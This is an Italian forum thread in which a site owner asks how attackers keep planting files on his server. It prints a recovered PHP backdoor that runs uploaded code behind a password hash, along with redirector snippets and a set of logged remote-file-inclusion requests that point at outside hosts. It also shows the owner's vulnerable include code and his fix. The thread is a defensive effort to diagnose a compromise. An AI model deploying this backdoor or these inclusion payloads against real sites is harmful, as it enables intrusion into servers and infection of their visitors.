Pagina 1 di 2 1 2 ultimoultimo
Visualizzazione dei risultati da 1 a 10 su 13
  1. #1

    come fanno a entrare nel mio sito?

    Sull'hosting di un sito che gestisco trovo spesso dei file che non ho mai messo... li cancello e dopo un po riappaiono.

    viene creata una directory ilub che contiene dei file:
    t.htm all'interno de quale c'è questo codice e0fa4c4356551c94d48ba476187f08e7 .

    blog.htm : una pagina HTML di un bog

    check.js : che l'antivirus riconosce come virus [TR/Redirector.E]

    dummy.htm : un file apparentemente vuoto che contiene questo codice: <html><body><script>try { document.getElementById('hr').click() } catch(e) { location.href='blog.htm' }</script></body></html>

    in un'altra directory h trovo 3 file:
    - .htaccess con: RewriteEngine On RewriteRule ^.*$ jahohoq.txt [L]
    - jahohoq.txt con: e0fa4c4356551c94d48ba476187f08e7

    in un file c'era ancej questo:

    <?
    php error_reporting(1);
    global $HTTP_SERVER_VARS;

    function say($t) {
    echo "$t\n";
    };

    function testdata($t) {
    say(md5("testdata_$t"));
    };

    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){
    eval($code);
    }else{
    testdata('f');
    };
    }else{
    testdata('pass');
    };
    testdata('end');
    echo "</pre>";
    ?>


    fa un eval cioè esegue un file che è in una directory temporanea. il file viene uploadato viene passato anche un parametro via POST che è "p" se p è uguale a aace99428c50dbe965acc93f3f275cd3 viene eseguito il codice.


    Ho riscritto il codice che gestiva gli include dinamicamente in modo da evitare che venga eseguito codice da remoto ma nonostante tutti gli accorgimenti possibili questo BASTARDO riesce sempre ad entrare nel sito e inserire questi maledetti file che cercano di infettare i visitatori.


    Qualcuno può darmi qualche aiuto?

    in rete ho trovato queste discussioni in merito:

    http://bbs.quickfox.net/msgs/msg.ssj...t&message=1133

    http://www.prozone.it/smf/index.php?topic=2934.new

  2. #2
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    ti è possibile fornire il link al sito?
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  3. #3
    Mi dispiace ma il link del sito non posso darlo...
    Oggi hanno addirittura fatto un defacement mettendo la faccia di Bush e insulti vari...
    hanno messe anche un file apache.php che non riesco a leggere perchè l'antivirus lo blocca.

    Penso che il problema sia negli include dinamici, utilizzavo questo codice:

    if (!isset($_GET['section'])) {
    include('homepage.php');
    }else{
    if (dirname($_GET['section'])=="."){
    $stringaOK = ereg_replace("[^A-Za-z0-9_-]", "", $_GET['section'] );
    include($stringaOK.".php");
    }else{
    $yourip = $_SERVER['REMOTE_ADDR'];
    echo "ALERT! Your IP address : ".$yourip."



    ";
    mail ("***", "***", "Messaggio:\n\n\n *** ip: ".$yourip."\n\n _GET['section']: ".$_GET['section'], "From: ***");
    }
    }


    ora l'ho cambiato con questo che dovrebbe essere piu sicuro:

    if(isset($_GET['section'])) {
    $p=$_GET['section'];
    if($p!=basename($p) || !preg_match("/^[A-Za-z0-9\-_]+$/",$p) || $p=="index" || !file_exists($p.".php")){
    $p="errore"; //pagina di errore
    }
    }
    include($p.".php");


    adesso cancello tutti i file e rimetto l'ultimo backup... non si sa mai che abbino lasciato quache altro script malefico.

    secondo voi quali possono essere el vulnerabilità che sfruttano? come fanno a inserire file sul server???

    boh...

  4. #4
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    "la mia macchina non funziona, cosa può essere?". Senza informazioni la tua domanda suona pressapoco allo stesso modo. I tipi di attacchi e di vulnerabilità sono tanti...

    Hai la possibilità di accedere ai log del server?
    Dalle richieste fatte dovresti poter capire qual è lo script vulnerabile.
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  5. #5
    già la domanda è generica, però se qualcuno ha già riscontrato lo stesso problema magari sa indicarmi che tipo di vulnerabilità sfruttano.

    queste sono alcune delle richieste GET che fanno:

    $_GET['section']: main
    $_GET['section']: main/home.php?link=http://www.underuaeh.com/images/banners/.jpg??
    $_GET['section']: http://weddingparty.eclub.lv/images?
    $_GET['section']: http://weddingparty.krovatka.su/images?
    $_GET['section']: corso/index.php?home=http://www.hollywoodgolfclub.org/.../category.txt??
    $_GET['section']: link/admin/a/root/logmain.php?link=http://www.hollywoodgolfclub.org/.../category.txt??
    $_GET['section']: http://weddingparty.eclub.lv/images?
    $_GET['section']: esame/index.php?area=http://190.7.235.5/m???

    Proverò anche a chiedere i log al fornitore dell'hosting intanto continuo a controllare tutti gli script per correggere eventuali vulnerabilità


    Sapete consigliare qualche buona guida sulla sicureza in PHP (a parte ovviamente quella presetne su HTML.it)???

  6. #6
    Moderatore di Sicurezza informatica e virus L'avatar di Habanero
    Registrato dal
    Jun 2001
    Messaggi
    9,782
    le richieste get da te riportate sono dei tentativi di remote inclusion. Bisognerebbe vedere se queste vanno a buon fine oppure no
    Leggi il REGOLAMENTO!

    E' molto complicato, un mucchio di input e output, una quantità di informazioni, un mucchio di elementi da considerare, ho una quantità di elementi da tener presente...
    Drugo

  7. #7
    c'è un metodo per verificare se ci riescono?

    Nel frattempo ho modificato gli script è ripubblicato il sito... per il momento cose "strane" sul server non ne vedo.

    PS: nella dir TMP ho addirittura trovato una backdoor riconosciuta da Antivir dal nome del file "back".

    Ciao

  8. #8
    Ho lo stesso problema.

    Ho notato che in Lightbox 2 (che uso per visualizzare gallerie di immagini) il file lightbox.css conteneva in fondo del codice non corretto.

    Controlli se ti succede lo stesso ?

    Ciao. Ilic.
    Visita:
    http://www.ethiopia.it
    http://www.tanganyika.it

  9. #9
    Originariamente inviato da bubbone
    Ho lo stesso problema.

    Ho notato che in Lightbox 2 (che uso per visualizzare gallerie di immagini) il file lightbox.css conteneva in fondo del codice non corretto.

    Controlli se ti succede lo stesso ?

    Ciao. Ilic.
    non uso Lightbox, il problema era nello script di inclusione dinamica...
    ciao

  10. #10
    Ho notato un'altra cosetta... Il problema succede solo sul server di Aruba.
    Non so se sia una coincidenza, ma su altri server non succede. Ho infatti copiato il sito su altri 3 domini in hosting su server di altri provider e il problema non si verifica.
    Sarà un caso ?

    Ciao. Ilic.
    Visita:
    http://www.ethiopia.it
    http://www.tanganyika.it

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2026 vBulletin Solutions, Inc. All rights reserved.